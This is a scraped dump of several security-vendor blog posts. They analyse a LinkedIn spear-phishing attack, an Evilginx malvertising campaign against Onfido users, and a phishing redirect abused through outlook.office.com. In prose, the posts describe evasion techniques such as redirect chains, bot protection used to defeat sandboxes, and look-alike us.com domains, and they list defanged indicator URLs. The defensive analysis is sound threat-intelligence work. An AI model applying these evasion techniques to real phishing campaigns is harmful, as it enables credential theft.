",{"data":39529,"content":39530,"nodeType":860},{},[39531],{"data":39532,"marks":39533,"value":39534,"nodeType":864},{},[],"With modern work communications now happening over several platforms, sites like LinkedIn where users can be directly messaged by people outside the organization, but are often accessed from work devices, are a prime target. ",{"data":39536,"content":39537,"nodeType":1312},{},[39538],{"data":39539,"marks":39540,"value":39542,"nodeType":864},{},[39541],{"type":899},"Using legitimate, trusted sites to host links",{"data":39544,"content":39545,"nodeType":860},{},[39546,39550,39558],{"data":39547,"marks":39548,"value":39549,"nodeType":864},{},[],"Attackers are increasingly ",{"data":39551,"content":39552,"nodeType":883},{"uri":39038},[39553],{"data":39554,"marks":39555,"value":39557,"nodeType":864},{},[39556],{"type":1455},"using legitimate sites to host their phishing links",{"data":39559,"marks":39560,"value":39561,"nodeType":864},{},[]," and perform redirections. Fronting phishing attacks with pages hosted on legitimate sites, in combination with lengthy redirect chains, can make it harder for security tools which rely on analysing the initial page served to the victim. In this example, Google Sites, Google Search, and Microsoft Dynamics were used. ",{"data":39563,"content":39564,"nodeType":1312},{},[39565],{"data":39566,"marks":39567,"value":39569,"nodeType":864},{},[39568],{"type":899},"Using bot protection to defeat sandbox analysis tools",{"data":39571,"content":39572,"nodeType":860},{},[39573,39577,39585],{"data":39574,"marks":39575,"value":39576,"nodeType":864},{},[],"Email and proxy security tools rely on loading a page in a web sandbox to analyze it for properties matching their detection signatures. However, dynamic elements that require user interaction to proceed are known to break these sandboxes. The most common way of attackers doing this is by ",{"data":39578,"content":39579,"nodeType":883},{"uri":35537},[39580],{"data":39581,"marks":39582,"value":39584,"nodeType":864},{},[39583],{"type":1455},"using legitimate bot protection",{"data":39586,"marks":39587,"value":39588,"nodeType":864},{},[]," technologies such as CAPTCHA and CloudFlare Turnstile. ",{"data":39590,"content":39591,"nodeType":1312},{},[39592],{"data":39593,"marks":39594,"value":39596,"nodeType":864},{},[39595],{"type":899},"Performing layered redirects at different stages",{"data":39598,"content":39599,"nodeType":860},{},[39600,39604,39612],{"data":39601,"marks":39602,"value":39603,"nodeType":864},{},[],"As already mentioned, the ",{"data":39605,"content":39606,"nodeType":883},{"uri":7248},[39607],{"data":39608,"marks":39609,"value":39611,"nodeType":864},{},[39610],{"type":1455},"chain of redirects",{"data":39613,"marks":39614,"value":39615,"nodeType":864},{},[]," across different sites was particularly notable in this case (you can see this in the timeline screenshot provided above). To maximize the lifespan of a malicious domain, attackers are known to use various redirection tricks (often though legit sites that are often excluded from scanning tools). Using several redirections before serving the malicious page to break referrer-based checks that are common in proxy solutions and prevent the initial URLs seeded out from being discovered. By obfuscating the initial URL delivered to victims, and both masking and rotating the phishing URLs, it is much harder for organizations to blocklist known-bad sites effectively.",{"data":39617,"content":39620,"nodeType":996},{"target":39618},{"sys":39619},{"id":27224,"type":1001,"linkType":1002},[],{"data":39622,"content":39623,"nodeType":1005},{},[],{"data":39625,"content":39626,"nodeType":1009},{},[39627],{"data":39628,"marks":39629,"value":39631,"nodeType":864},{},[39630],{"type":899},"Indicators of Compromise",{"data":39633,"content":39634,"nodeType":860},{},[39635],{"data":39636,"marks":39637,"value":39638,"nodeType":864},{},[],"Static IoCs are of limited value in this case due to the use of disposable pages designed to be used once and then rotated. In this case, the page hosting the malicious AITM kit has now been flagged by Google after being reported. This makes blocking specific malicious subdomains hosted on otherwise legitimate sites difficult. However, we have observed a consistent pattern in the attacks identified by Push:",{"data":39640,"content":39641,"nodeType":941},{},[39642,39652,39662,39672],{"data":39643,"content":39644,"nodeType":945},{},[39645],{"data":39646,"content":39647,"nodeType":860},{},[39648],{"data":39649,"marks":39650,"value":39651,"nodeType":864},{},[],"Phishing lure delivered over LinkedIn",{"data":39653,"content":39654,"nodeType":945},{},[39655],{"data":39656,"content":39657,"nodeType":860},{},[39658],{"data":39659,"marks":39660,"value":39661,"nodeType":864},{},[],"Link to sites.google.com page (e.g. sites.google.com/view/\u003CINVESTMENTCOMPANY>-ai/home)",{"data":39663,"content":39664,"nodeType":945},{},[39665],{"data":39666,"content":39667,"nodeType":860},{},[39668],{"data":39669,"marks":39670,"value":39671,"nodeType":864},{},[],"Link to Microsoft Dynamics page (e.g. [assets-usa.mkt].dynamics.com/...)",{"data":39673,"content":39674,"nodeType":945},{},[39675],{"data":39676,"content":39677,"nodeType":860},{},[39678],{"data":39679,"marks":39680,"value":39681,"nodeType":864},{},[],"Link to (*).sa.com phishing page",{"data":39683,"content":39684,"nodeType":860},{},[39685],{"data":39686,"marks":39687,"value":39688,"nodeType":864},{},[],"Given the targeted nature of the attack, we recommend hunting for executive-level users accessing some combination of these URLs (and variants) in a short timespan.",{"data":39690,"content":39691,"nodeType":860},{},[39692],{"data":39693,"marks":39694,"value":39695,"nodeType":864},{},[],"We also recommend informing your executive team about the rise in LinkedIn phishing attacks and the specific nature of the investment opportunity lure.",{"data":39697,"content":39698,"nodeType":1005},{},[],{"data":39700,"content":39701,"nodeType":1009},{},[39702],{"data":39703,"marks":39704,"value":7114,"nodeType":864},{},[39705],{"type":899},{"data":39707,"content":39708,"nodeType":860},{},[39709],{"data":39710,"marks":39711,"value":39712,"nodeType":864},{},[],"There aren’t many more valuable accounts than those belonging to your company executives. Compromising a Google Workspace account doesn’t just give the attacker access to the Workspace tenant, emails, chat, etc. — it also grants access to any accounts on downstream apps configured for SSO. The blast radius of such a compromise is pretty widespread, giving plenty of scope for further exploitation for an attacker with a clear idea of what they want to achieve. ",{"data":39714,"content":39715,"nodeType":860},{},[39716,39720,39729,39732,39741,39745,39753],{"data":39717,"marks":39718,"value":39719,"nodeType":864},{},[],"In short, stopping this attack at the earliest opportunity was a significant benefit. Even if the attack had been later stopped following the compromise and the stolen account reset, unpicking the web of potentially compromised downstream accounts that may have been accessed and backdoored by the attacker (such as by configuring stealthy persistence mechanisms like ",{"data":39721,"content":39723,"nodeType":883},{"uri":39722},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/evil_twin_integrations/description.md",[39724],{"data":39725,"marks":39726,"value":39728,"nodeType":864},{},[39727],{"type":1455},"evil twin integrations",{"data":39730,"marks":39731,"value":3731,"nodeType":864},{},[],{"data":39733,"content":39735,"nodeType":883},{"uri":39734},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/api_keys/description.md",[39736],{"data":39737,"marks":39738,"value":39740,"nodeType":864},{},[39739],{"type":1455},"API keys",{"data":39742,"marks":39743,"value":39744,"nodeType":864},{},[]," or other ",{"data":39746,"content":39747,"nodeType":883},{"uri":19131},[39748],{"data":39749,"marks":39750,"value":39752,"nodeType":864},{},[39751],{"type":1455},"ghost login",{"data":39754,"marks":39755,"value":39756,"nodeType":864},{},[]," methods) presents a sizable overhead for the security team.     ",{"data":39758,"content":39759,"nodeType":1005},{},[],{"data":39761,"content":39762,"nodeType":1009},{},[39763],{"data":39764,"marks":39765,"value":3578,"nodeType":864},{},[39766],{"type":899},{"data":39768,"content":39769,"nodeType":860},{},[39770],{"data":39771,"marks":39772,"value":39773,"nodeType":864},{},[],"Two key features played a part in this detection, which you can read more about below:",{"data":39775,"content":39776,"nodeType":941},{},[39777,39798],{"data":39778,"content":39779,"nodeType":945},{},[39780],{"data":39781,"content":39782,"nodeType":860},{},[39783,39786,39795],{"data":39784,"marks":39785,"value":21,"nodeType":864},{},[],{"data":39787,"content":39789,"nodeType":883},{"uri":39788},"https://pushsecurity.com/blog/detecting-and-blocking-phishing-attacks-in-the-browser/",[39790],{"data":39791,"marks":39792,"value":39794,"nodeType":864},{},[39793],{"type":1455},"Phishing attack detection",{"data":39796,"marks":39797,"value":21,"nodeType":864},{},[],{"data":39799,"content":39800,"nodeType":945},{},[39801],{"data":39802,"content":39803,"nodeType":860},{},[39804,39807,39816],{"data":39805,"marks":39806,"value":21,"nodeType":864},{},[],{"data":39808,"content":39810,"nodeType":883},{"uri":39809},"https://pushsecurity.com/blog/introducing-push-detections/",[39811],{"data":39812,"marks":39813,"value":39815,"nodeType":864},{},[39814],{"type":1455},"Push detection and response capabilities inc. timeline visibility ",{"data":39817,"marks":39818,"value":21,"nodeType":864},{},[],{"data":39820,"content":39821,"nodeType":860},{},[39822,39826,39831,39835,39842],{"data":39823,"marks":39824,"value":39825,"nodeType":864},{},[],"Push doesn’t detect the redirect tricks or rely on outdated domain TI feeds. The reason we detect these attacks (which make it through all the other layers of phishing protection) is that ",{"data":39827,"marks":39828,"value":39830,"nodeType":864},{},[39829],{"type":899},"Push sees what your users see",{"data":39832,"marks":39833,"value":39834,"nodeType":864},{},[],". It doesn’t matter what ",{"data":39836,"content":39837,"nodeType":883},{"uri":7124},[39838],{"data":39839,"marks":39840,"value":28345,"nodeType":864},{},[39841],{"type":1455},{"data":39843,"marks":39844,"value":39845,"nodeType":864},{},[],", Push detects and blocks attacks by identifying the attack in real time, as the user loads the page in their web browser.",{"data":39847,"content":39848,"nodeType":860},{},[39849],{"data":39850,"marks":39851,"value":39852,"nodeType":864},{},[],"This isn’t all we do: Push’s browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, password spraying and session hijacking using stolen session tokens. You don’t need to wait until it all goes wrong — you can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more to harden your identity attack surface.",{"data":39854,"content":39855,"nodeType":860},{},[39856,39860,39867],{"data":39857,"marks":39858,"value":39859,"nodeType":864},{},[],"If you want to learn more about how Push helps you to detect and stop attacks in the browser, ",{"data":39861,"content":39862,"nodeType":883},{"uri":5642},[39863],{"data":39864,"marks":39865,"value":10299,"nodeType":864},{},[39866],{"type":1455},{"data":39868,"marks":39869,"value":2924,"nodeType":864},{},[],"How Push stopped a high risk LinkedIn spear-phishing attack against a company exec","How Push saved a company exec from a sophisticated Attacker-in-the-Middle phishing attack delivered via a LinkedIn direct message.","2025-09-08T00:00:00.000Z","how-push-stopped-a-high-risk-linkedin-spear-phishing-attack",{"items":39875},[39876,39878],{"sys":39877,"name":342},{"id":6596},{"sys":39879,"name":6593},{"id":6592},{"items":39881},[39882],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":39883},{"url":2740},{"__typename":2059,"sys":39885,"content":39887,"title":40357,"synopsis":40358,"hashTags":59,"publishedDate":40359,"slug":40360,"tagsCollection":40361,"authorsCollection":40367},{"id":39886},"51p0V5Vr4I9rapUytBWX0R",{"json":39888},{"data":39889,"content":39890,"nodeType":856},{},[39891,39898,39905,39912,39918,39925,39931,39938,39945,39948,39956,39963,39970,39993,40000,40003,40011,40026,40032,40039,40045,40052,40059,40062,40070,40090,40096,40103,40109,40112,40120,40140,40146,40153,40159,40179,40185,40191,40194,40202,40209,40216,40222,40225,40233,40240,40247,40250,40258,40265,40272,40278,40285,40318,40324,40332,40339],{"data":39892,"content":39893,"nodeType":1009},{},[39894],{"data":39895,"marks":39896,"value":5002,"nodeType":864},{},[39897],{"type":899},{"data":39899,"content":39900,"nodeType":860},{},[39901],{"data":39902,"marks":39903,"value":39904,"nodeType":864},{},[],"On April 11th our browser-based phishing detection controls were triggered for a user with the Push extension installed. ",{"data":39906,"content":39907,"nodeType":860},{},[39908],{"data":39909,"marks":39910,"value":39911,"nodeType":864},{},[],"The user had visited the url dashboard[.]onfido[.].us[.]com after entering a Google search for ‘onfido’, a site they had previously accessed for work and had an account on. A convincing looking Google ad duped the user into clicking the fake link.",{"data":39913,"content":39917,"nodeType":996},{"target":39914},{"sys":39915},{"id":39916,"type":1001,"linkType":1002},"5o1LEkZfeYVjMZmROi3Yh",[],{"data":39919,"content":39920,"nodeType":860},{},[39921],{"data":39922,"marks":39923,"value":39924,"nodeType":864},{},[],"Although the page was not the official login page for Onfido, it appeared legitimate enough at first glance to trick the user. ",{"data":39926,"content":39930,"nodeType":996},{"target":39927},{"sys":39928},{"id":39929,"type":1001,"linkType":1002},"4Tp1RJ3eSx7r79wwm9d9DZ",[],{"data":39932,"content":39933,"nodeType":860},{},[39934],{"data":39935,"marks":39936,"value":39937,"nodeType":864},{},[],"After clicking the link, the user was blocked from interacting with the malicious page running Evilginx by Push. We then took action to identify other Onfido users within the Push customer base and notify them accordingly of the campaign. ",{"data":39939,"content":39940,"nodeType":860},{},[39941],{"data":39942,"marks":39943,"value":39944,"nodeType":864},{},[],"There are a few interesting elements worth exploring. Let’s dive in. ",{"data":39946,"content":39947,"nodeType":1005},{},[],{"data":39949,"content":39950,"nodeType":1009},{},[39951],{"data":39952,"marks":39953,"value":39955,"nodeType":864},{},[39954],{"type":899},"Why Onfido?",{"data":39957,"content":39958,"nodeType":860},{},[39959],{"data":39960,"marks":39961,"value":39962,"nodeType":864},{},[],"Onfido is an interesting choice. It’s not your typical phishing target, which points to an interesting trend we’ve observed where attackers are diversifying their phishing targets. ",{"data":39964,"content":39965,"nodeType":860},{},[39966],{"data":39967,"marks":39968,"value":39969,"nodeType":864},{},[],"There are two main reasons for this:",{"data":39971,"content":39972,"nodeType":941},{},[39973,39983],{"data":39974,"content":39975,"nodeType":945},{},[39976],{"data":39977,"content":39978,"nodeType":860},{},[39979],{"data":39980,"marks":39981,"value":39982,"nodeType":864},{},[],"People are becoming increasingly suspicious of phishing attacks targeting core apps such as Microsoft, Google, Okta, etc. and are much more likely to spot real vs fake pages. ",{"data":39984,"content":39985,"nodeType":945},{},[39986],{"data":39987,"content":39988,"nodeType":860},{},[39989],{"data":39990,"marks":39991,"value":39992,"nodeType":864},{},[],"Because highly targeted apps like IdPs and enterprise cloud platforms are becoming increasingly hardened from an identity perspective, attackers have a lower chance of success relative to accounts on the long tail of internet apps used by an organization — many of which simply cannot be securely configured in the same way (e.g. no passkey/WebAuthn support, limited admin controls to discover and remediate identity security gaps, etc.). ",{"data":39994,"content":39995,"nodeType":860},{},[39996],{"data":39997,"marks":39998,"value":39999,"nodeType":864},{},[],"Onfido is also an interesting example in that it definitely contains valuable data that attackers can take advantage of. As a digital identity solution, it presents a significant risk from both a personal and company perspective if compromised, with plenty of PII that can be leveraged to extort a victim — and clear bad press (and possible regulator scrutiny) if the data is leaked!",{"data":40001,"content":40002,"nodeType":1005},{},[],{"data":40004,"content":40005,"nodeType":1009},{},[40006],{"data":40007,"marks":40008,"value":40010,"nodeType":864},{},[40009],{"type":899},"Why Google ads?",{"data":40012,"content":40013,"nodeType":860},{},[40014,40018,40022],{"data":40015,"marks":40016,"value":40017,"nodeType":864},{},[],"The attack is a form of ",{"data":40019,"marks":40020,"value":441,"nodeType":864},{},[40021],{"type":899},{"data":40023,"marks":40024,"value":40025,"nodeType":864},{},[]," where attackers distribute malicious links via ads — in this case, via Google. This is just one example of the many non-email phishing channels that attackers have at their disposal today. ",{"data":40027,"content":40031,"nodeType":996},{"target":40028},{"sys":40029},{"id":40030,"type":1001,"linkType":1002},"7kfeOKGXEWVL5RW5jFnQBo",[],{"data":40033,"content":40034,"nodeType":860},{},[40035],{"data":40036,"marks":40037,"value":40038,"nodeType":864},{},[],"The use of malvertising has a couple of notable advantages here. Namely, because Google ads do not use the same reputation-based checks as an email security provider does, the attacker can use freshly created domains to conduct the attack. Usually, attackers would aim to take over existing domains with a reputation already built up, or spend 6-12 months bedding in their domains so that they pass mail filters. ",{"data":40040,"content":40044,"nodeType":996},{"target":40041},{"sys":40042},{"id":40043,"type":1001,"linkType":1002},"499fj1Xark8Bj7iQjv9Vsm",[],{"data":40046,"content":40047,"nodeType":860},{},[40048],{"data":40049,"marks":40050,"value":40051,"nodeType":864},{},[],"But in this case, the domain was registered only shortly before being used. We detected it only a few hours after it had been registered — and it’s already been taken down since (no doubt to be replaced with the next one). This means it’s easy for attackers to spin up these malvertising campaigns at will, without any real forward planning. ",{"data":40053,"content":40054,"nodeType":860},{},[40055],{"data":40056,"marks":40057,"value":40058,"nodeType":864},{},[],"In fact, malvertising doesn’t require much effort on the attacker’s part whatsoever. As a watering hole, you put the link up and wait for the clicks to roll in. Unfortunately, many people Google search for sites that they frequently use rather than accessing via bookmark, opening them up to these kinds of malvertising attacks. ",{"data":40060,"content":40061,"nodeType":1005},{},[],{"data":40063,"content":40064,"nodeType":1312},{},[40065],{"data":40066,"marks":40067,"value":40069,"nodeType":864},{},[40068],{"type":899},"No frills ",{"data":40071,"content":40072,"nodeType":860},{},[40073,40077,40086],{"data":40074,"marks":40075,"value":40076,"nodeType":864},{},[],"Unlike many of the other campaigns using MFA-bypass phishing kits we’ve seen in the wild, the attacker put very little effort into obfuscating the malicious page. We’ve seen some using things like Cloudflare Turnstile, CAPTCHA, or even ",{"data":40078,"content":40080,"nodeType":883},{"uri":40079},"https://pushsecurity.com/blog/how-consent-phishing-is-evolving/",[40081],{"data":40082,"marks":40083,"value":40085,"nodeType":864},{},[40084],{"type":1455},"Consent Phishing for OIDC scopes ",{"data":40087,"marks":40088,"value":40089,"nodeType":864},{},[],"to break sandbox detections and prevent security tools from reaching the malicious content to analyze it. ",{"data":40091,"content":40095,"nodeType":996},{"target":40092},{"sys":40093},{"id":40094,"type":1001,"linkType":1002},"7csybR6fJlCWsRy91CbNYL",[],{"data":40097,"content":40098,"nodeType":860},{},[40099],{"data":40100,"marks":40101,"value":40102,"nodeType":864},{},[],"That said, there was evidence to suggest that the domain required a specific URL path — namely, the page must be accessed via Google ads to load. When the page was accessed without the correct parameters set, we were forwarded to a nonexistent page within the legitimate onfido.com domain, resulting in a 404 error.",{"data":40104,"content":40108,"nodeType":996},{"target":40105},{"sys":40106},{"id":40107,"type":1001,"linkType":1002},"658fTppp0l1YkoMERiQ1Oj",[],{"data":40110,"content":40111,"nodeType":1005},{},[],{"data":40113,"content":40114,"nodeType":1009},{},[40115],{"data":40116,"marks":40117,"value":40119,"nodeType":864},{},[40118],{"type":899},"What’s interesting about the domain?",{"data":40121,"content":40122,"nodeType":860},{},[40123,40127,40136],{"data":40124,"marks":40125,"value":40126,"nodeType":864},{},[],"One of the things that really stood out to us was the hosting domain — ",{"data":40128,"content":40130,"nodeType":883},{"uri":40129},"http://us.com",[40131],{"data":40132,"marks":40133,"value":40135,"nodeType":864},{},[40134],{"type":1455},"us.com",{"data":40137,"marks":40138,"value":40139,"nodeType":864},{},[],". Unlike the official government TLD .us, us.com is designed to look and feel legit but does not require any US affiliation or evidence of a US presence. This isn’t a TLD, it’s just a domain selling subdomains within their domain. This means there’s no WHOIS information available on the domains. ",{"data":40141,"content":40145,"nodeType":996},{"target":40142},{"sys":40143},{"id":40144,"type":1001,"linkType":1002},"7HtOWLePxPclyfODqC0oR",[],{"data":40147,"content":40148,"nodeType":860},{},[40149],{"data":40150,"marks":40151,"value":40152,"nodeType":864},{},[],"This is incredibly deceptive to the user and will fool many people glancing at the link. It doesn’t look as obviously suspicious as your .xyz or .biz and has the feel of a legitimate domain. It’s also incredibly cheap to pick up .us.com domains right now. ",{"data":40154,"content":40158,"nodeType":996},{"target":40155},{"sys":40156},{"id":40157,"type":1001,"linkType":1002},"5CHWwlH2ZFZiVOQWMpkquy",[],{"data":40160,"content":40161,"nodeType":860},{},[40162,40166,40175],{"data":40163,"marks":40164,"value":40165,"nodeType":864},{},[],"You can find additional information on ",{"data":40167,"content":40169,"nodeType":883},{"uri":40168},"https://urlscan.io/result/0196338c-75ea-720c-a0e4-c2898acc4779/",[40170],{"data":40171,"marks":40172,"value":40174,"nodeType":864},{},[40173],{"type":1455},"urlscan",{"data":40176,"marks":40177,"value":40178,"nodeType":864},{},[]," here.",{"data":40180,"content":40184,"nodeType":996},{"target":40181},{"sys":40182},{"id":40183,"type":1001,"linkType":1002},"6hdBHT8SrC6z7O0gIc7xnh",[],{"data":40186,"content":40190,"nodeType":996},{"target":40187},{"sys":40188},{"id":40189,"type":1001,"linkType":1002},"3KxFiCeGlk7fVC8k1oo7cX",[],{"data":40192,"content":40193,"nodeType":1005},{},[],{"data":40195,"content":40196,"nodeType":1009},{},[40197],{"data":40198,"marks":40199,"value":40201,"nodeType":864},{},[40200],{"type":899},"Isn’t Evilginx a red team tool?",{"data":40203,"content":40204,"nodeType":860},{},[40205],{"data":40206,"marks":40207,"value":40208,"nodeType":864},{},[],"Evilginx is nominally a red team tool, but we frequently spot it being used in phishing campaigns against our customers. Evilginx is a great choice for attackers looking to target non-standard web apps because it is capable of emulating a range of domains — it’s designed to be flexible and work for any page without generating a load of custom JavaScript that might stand out to security tools/analysts. ",{"data":40210,"content":40211,"nodeType":860},{},[40212],{"data":40213,"marks":40214,"value":40215,"nodeType":864},{},[],"If you want to see an example of Evilginx being used to phish a user, check out the example below. ",{"data":40217,"content":40221,"nodeType":996},{"target":40218},{"sys":40219},{"id":40220,"type":1001,"linkType":1002},"7IuP0mcRZJkL8YGNoZo5Dj",[],{"data":40223,"content":40224,"nodeType":1005},{},[],{"data":40226,"content":40227,"nodeType":1009},{},[40228],{"data":40229,"marks":40230,"value":40232,"nodeType":864},{},[40231],{"type":899},"What can you do about it?",{"data":40234,"content":40235,"nodeType":860},{},[40236],{"data":40237,"marks":40238,"value":40239,"nodeType":864},{},[],"There’s not a huge amount of impartial advice to give here unfortunately. With malicious Google ads not going away anytime soon, response action is limited. If you are an Onfido user, be sure to block the URL and any related patterns (we noticed that after appearing to have been taken down initially, the site has reappeared at dashboard[.]onfido[.]us[.]com/users/sign_in and no longer appears to require the same URL path). However, it goes without saying that this is a temporary measure and the attacker will no doubt rotate the domain in the near future. ",{"data":40241,"content":40242,"nodeType":860},{},[40243],{"data":40244,"marks":40245,"value":40246,"nodeType":864},{},[],"One good option is to encourage your users to bookmark their links rather than Google searching for the page. If you’re using an IdP with an application dashboard like Okta, Microsoft, or Google, this provides a convenient way to find all your apps in one place. ",{"data":40248,"content":40249,"nodeType":1005},{},[],{"data":40251,"content":40252,"nodeType":1009},{},[40253],{"data":40254,"marks":40255,"value":40257,"nodeType":864},{},[40256],{"type":899},"Bonus: How Push stopped the attack",{"data":40259,"content":40260,"nodeType":860},{},[40261],{"data":40262,"marks":40263,"value":40264,"nodeType":864},{},[],"Interested in how we stopped the attack?",{"data":40266,"content":40267,"nodeType":860},{},[40268],{"data":40269,"marks":40270,"value":40271,"nodeType":864},{},[],"When the user visited the page, Push detected Evilginx running on the page and blocked the user. Check it out.",{"data":40273,"content":40277,"nodeType":996},{"target":40274},{"sys":40275},{"id":40276,"type":1001,"linkType":1002},"5QavzZPS4siFvHCBhpujEe",[],{"data":40279,"content":40280,"nodeType":860},{},[40281],{"data":40282,"marks":40283,"value":40284,"nodeType":864},{},[],"Using our browser-based security platform, you can also see all users with an account on Onfido across your workforce. Using Push, you can:",{"data":40286,"content":40287,"nodeType":941},{},[40288,40298,40308],{"data":40289,"content":40290,"nodeType":945},{},[40291],{"data":40292,"content":40293,"nodeType":860},{},[40294],{"data":40295,"marks":40296,"value":40297,"nodeType":864},{},[],"Quickly identify which users have a password-based login set for their account (and therefore could be phished). ",{"data":40299,"content":40300,"nodeType":945},{},[40301],{"data":40302,"content":40303,"nodeType":860},{},[40304],{"data":40305,"marks":40306,"value":40307,"nodeType":864},{},[],"Identify users to enable them to be contacted about the attacks targeting Onfido.",{"data":40309,"content":40310,"nodeType":945},{},[40311],{"data":40312,"content":40313,"nodeType":860},{},[40314],{"data":40315,"marks":40316,"value":40317,"nodeType":864},{},[],"Set an app banner for Onfido warning users of the attacks and guiding them to access and login to the app via your SSO solution. ",{"data":40319,"content":40323,"nodeType":996},{"target":40320},{"sys":40321},{"id":40322,"type":1001,"linkType":1002},"23B4EHUs1vt0se5r1cUI4t",[],{"data":40325,"content":40326,"nodeType":1312},{},[40327],{"data":40328,"marks":40329,"value":40331,"nodeType":864},{},[40330],{"type":899},"We don’t just stop phishing attacks",{"data":40333,"content":40334,"nodeType":860},{},[40335],{"data":40336,"marks":40337,"value":40338,"nodeType":864},{},[],"It doesn’t stop there — Push provides comprehensive identity attack detection and response capabilities against techniques like credential stuffing, password spraying and session hijacking using stolen session tokens. You can also use Push to find and fix identity vulnerabilities across every app that your employees use like: ghost logins; SSO coverage gaps; MFA gaps; weak, breached and reused passwords; risky OAuth integrations; and more. ",{"data":40340,"content":40341,"nodeType":860},{},[40342,40346,40353],{"data":40343,"marks":40344,"value":40345,"nodeType":864},{},[],"If you want to learn more about how Push helps you to detect and defeat advanced identity attack techniques in the browser, ",{"data":40347,"content":40348,"nodeType":883},{"uri":1700},[40349],{"data":40350,"marks":40351,"value":40352,"nodeType":864},{},[],"book some time with one of our team",{"data":40354,"marks":40355,"value":40356,"nodeType":864},{},[]," for a live demo.","Investigating a recent malvertising campaign targeting Onfido customers","We recently investigated a malvertising campaign using Evilginx to target Onfido customers via Google ads.","2025-04-15T00:00:00.000Z","investigating-a-recent-malvertising-campaign-targeting-onfido-customers",{"items":40362},[40363,40365],{"sys":40364,"name":6593},{"id":6592},{"sys":40366,"name":342},{"id":6596},{"items":40368},[40369],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":40370},{"url":4955},{"__typename":2059,"sys":40372,"content":40374,"title":40965,"synopsis":40966,"hashTags":59,"publishedDate":40967,"slug":40968,"tagsCollection":40969,"authorsCollection":40975},{"id":40373},"5y6UUG3mMTu1dFhtKO0AUT",{"json":40375},{"data":40376,"content":40377,"nodeType":856},{},[40378,40385,40392,40412,40419,40438,40445,40448,40456,40463,40470,40476,40483,40528,40570,40578,40585,40605,40641,40647,40654,40660,40667,40675,40705,40711,40714,40721,40741,40761,40791,40796,40799,40807,40814,40907,40910,40917,40933,40940,40947],{"data":40379,"content":40380,"nodeType":860},{},[40381],{"data":40382,"marks":40383,"value":40384,"nodeType":864},{},[],"Everything we do at Push is research-driven. Our detections for phishing attacks were created through hands-on analysis of phishing kits that our customers have been targeted with. This gives us a steady supply of all manner of modern Attacker-in-the-Middle phishing kits to analyze — from the classic Evilginx-style phish kit to professionalized criminal as-a-Service infrastructure. ",{"data":40386,"content":40387,"nodeType":860},{},[40388],{"data":40389,"marks":40390,"value":40391,"nodeType":864},{},[],"In our most recent phish kit teardown, we encountered a standard reverse-proxy clone of a Microsoft login page — nothing unusual at first glance. But increasingly, a lot of the innovation comes outside of the phishing page itself. ",{"data":40393,"content":40394,"nodeType":860},{},[40395,40399,40408],{"data":40396,"marks":40397,"value":40398,"nodeType":864},{},[],"The art in detection evasion comes from being able to successfully deliver the page to a user and have them open the page without it being intercepted by an email security, proxy scanner, URL TI feed, or web analysis tool. To achieve this, the attacker found a way to redirect from a legitimate ",{"data":40400,"content":40402,"nodeType":883},{"uri":40401},"http://outlook.office.com",[40403],{"data":40404,"marks":40405,"value":40407,"nodeType":864},{},[40406],{"type":1455},"outlook.office.com",{"data":40409,"marks":40410,"value":40411,"nodeType":864},{},[]," link to a phishing website. ",{"data":40413,"content":40414,"nodeType":860},{},[40415],{"data":40416,"marks":40417,"value":40418,"nodeType":864},{},[],"This is essentially an open redirect vulnerability — maybe not the classic example where someone has forgotten to do input sanitization on their website, but the outcome is the same.",{"data":40420,"content":40421,"nodeType":860},{},[40422,40426,40434],{"data":40423,"marks":40424,"value":40425,"nodeType":864},{},[],"Central to our analysis was the use of our timelines feature, ",{"data":40427,"content":40428,"nodeType":883},{"uri":39809},[40429],{"data":40430,"marks":40431,"value":40433,"nodeType":864},{},[40432],{"type":1455},"part of our latest Detections feature release",{"data":40435,"marks":40436,"value":40437,"nodeType":864},{},[],". I’m not going to talk in any detail about this, but the TL;DR is that it allows us to trace back the entire chain of browsing activity leading up to a detection — showing the full (sometimes lengthy) redirect chain from the initial link delivery source to the actual phishing page, tabs opened and closed, popup windows, forms submitted, passwords entered, and more. ",{"data":40439,"content":40440,"nodeType":860},{},[40441],{"data":40442,"marks":40443,"value":40444,"nodeType":864},{},[],"First, let’s go through the steps of my investigation before looking at the findings (and the implications for phishing detection evasion techniques). ",{"data":40446,"content":40447,"nodeType":1005},{},[],{"data":40449,"content":40450,"nodeType":1009},{},[40451],{"data":40452,"marks":40453,"value":40455,"nodeType":864},{},[40454],{"type":899},"Investigation walkthrough",{"data":40457,"content":40458,"nodeType":860},{},[40459],{"data":40460,"marks":40461,"value":40462,"nodeType":864},{},[],"As I opened with, there was nothing especially notable about the phishing page itself — a standard reverse-proxy AitM page designed to intercept the user’s session as they authenticate, bypassing MFA in the process. ",{"data":40464,"content":40465,"nodeType":860},{},[40466],{"data":40467,"marks":40468,"value":40469,"nodeType":864},{},[],"This was not targeted delivery — employees from several customers were impacted. I’ve included an example of how one user arrived at the site below.",{"data":40471,"content":40475,"nodeType":996},{"target":40472},{"sys":40473},{"id":40474,"type":1001,"linkType":1002},"51MnOL9XqQDkllK2Jer4S9",[],{"data":40477,"content":40478,"nodeType":860},{},[40479],{"data":40480,"marks":40481,"value":40482,"nodeType":864},{},[],"This one stood out to me for a few reasons. ",{"data":40484,"content":40485,"nodeType":941},{},[40486,40496,40518],{"data":40487,"content":40488,"nodeType":945},{},[40489],{"data":40490,"content":40491,"nodeType":860},{},[40492],{"data":40493,"marks":40494,"value":40495,"nodeType":864},{},[],"The user had accessed the malicious link from Google search. They searched “Office 265\" (a typo presumably), clicked a link, and were taken to an Office login page.",{"data":40497,"content":40498,"nodeType":945},{},[40499],{"data":40500,"content":40501,"nodeType":860},{},[40502,40506,40514],{"data":40503,"marks":40504,"value":40505,"nodeType":864},{},[],"The Outlook link had a number of Google Ads tracking parameters attached, meaning they clicked an ad, not an organic link — making this a ",{"data":40507,"content":40509,"nodeType":883},{"uri":40508},"https://pushsecurity.github.io/phishing-techniques/techniques/malvertising/",[40510],{"data":40511,"marks":40512,"value":441,"nodeType":864},{},[40513],{"type":1455},{"data":40515,"marks":40516,"value":40517,"nodeType":864},{},[]," attack. 